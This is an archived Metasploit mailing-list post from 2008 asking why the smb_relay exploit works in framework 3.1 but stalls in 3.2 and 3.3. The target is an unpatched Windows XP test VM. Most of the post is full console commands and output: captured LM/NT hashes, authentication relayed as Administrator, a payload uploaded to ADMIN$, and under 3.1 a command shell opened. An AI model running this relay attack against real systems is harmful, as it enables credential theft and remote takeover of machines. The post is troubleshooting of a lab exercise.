Metasploit mailing list archives
smbrelay: framework 3.1 more reliable than 3.2 and 3.3?
From: m.iodice at gmail.com (Mirko Iodice)
Date: Tue, 2 Dec 2008 10:26:46 +0100
Recently I tested smbrelay attack from 3 different versions of metasploit against an unpatched (ms08-068) Windows XP Pro SP2 (VMWare test machine). I've got the same strange results running the attack from two different Linux boxes: one is my Ubuntu Intrepid Ibex and another one is a Backtrack 3 Virtual Machine. Below you can find the results, only metasploit framework 3.1 always works... someone can explain what's happening? Thank you. --- msf v3.3-dev rev. 5990 vs unpatched (ms08-068) XP Pro SP2 msf > use windows/smb/smb_relay msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp PAYLOAD => windows/shell/bind_tcp msf exploit(smb_relay) > exploit [*] Exploit running as background job. msf exploit(smb_relay) > [*] Started bind handler [*] Server started. [*] Received 192.168.109.128:1129 TESTDOMAIN\Administrator LMHASH:7a82adf17f0d0d797eea14a99f17a00883c8db54aebfece8 NTHASH:8a2ffa5bd93d8a445f7b403d905c78b36909948a81e4b2ba OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator... [*] AUTHENTICATED as TESTDOMAIN\Administrator... [*] Connecting to the ADMIN$ share... [*] Regenerating the payload... [*] Started bind handler [*] Uploading payload... [*] Created \QUmlMAKy.exe... [*] Connecting to the Service Control Manager... get stuck here and nothing happens... --- msf v3.2-release vs unpatched (ms08-068) XP Pro SP2 msf > use windows/smb/smb_relay msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp PAYLOAD => windows/shell/bind_tcp msf exploit(smb_relay) > exploit [*] Exploit running as background job. msf exploit(smb_relay) > [*] Started bind handler [*] Server started. [*] Received 192.168.109.128:1145 TESTDOMAIN\Administrator LMHASH:b1af5fb25aedf0a866e0c894fc7245c120a901b7811ecdc9 NTHASH:c72f5d912ab3429c187391217d7c17888fe0dbd2dc84a228 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator... [*] AUTHENTICATED as TESTDOMAIN\Administrator... [*] Connecting to the ADMIN$ share... [*] Regenerating the payload... [*] Started bind handler [*] Uploading payload... [*] Created \fcRkDlSK.exe... [*] Connecting to the Service Control Manager... get stuck here and nothing happens... --- msf v3.1-release vs unpatched (ms08-068) XP Pro SP2 msf > use windows/smb/smb_relay msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp PAYLOAD => windows/shell/bind_tcp msf exploit(smb_relay) > exploit [*] Server started. msf exploit(smb_relay) > [*] Received 192.168.109.128:1181 TESTDOMAIN\Administrator LMHASH:b28812aaf57e770414a8f6d52eae10f907b2c4479b63f0b5 NTHASH:20b10932651da64ea42a2f0a6aaea0e59f7aba4d9bda6fa3 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator... [*] AUTHENTICATED as TESTDOMAIN\Administrator... [*] Connecting to the ADMIN$ share... [*] Regenerating the payload... [*] Started bind handler [*] Uploading payload... [*] Created \DIfcbGwH.exe... [*] Connecting to the Service Control Manager... [*] Obtaining a service manager handle... [*] Creating a new service... [*] Closing service handle... [*] Opening service... [*] You *MUST* manually remove the service: 192.168.109.128 (DyHcMKdL - "MrXgHSxGCUuHbsLgpIFNQmAd") [*] You *MUST* manually delete the service file: 192.168.109.128 %SYSTEMROOT%\DIfcbGwH.exe [*] Starting the service... [*] Sending stage (474 bytes) [*] Command shell session 1 opened (192.168.109.1:44105 -> 192.168.109.128:4444) it works! ---
Current thread:
- smbrelay: framework 3.1 more reliable than 3.2 and 3.3? Mirko Iodice (Dec 02)
- smbrelay: framework 3.1 more reliable than 3.2 and 3.3? Nicolas RUFF (Dec 02)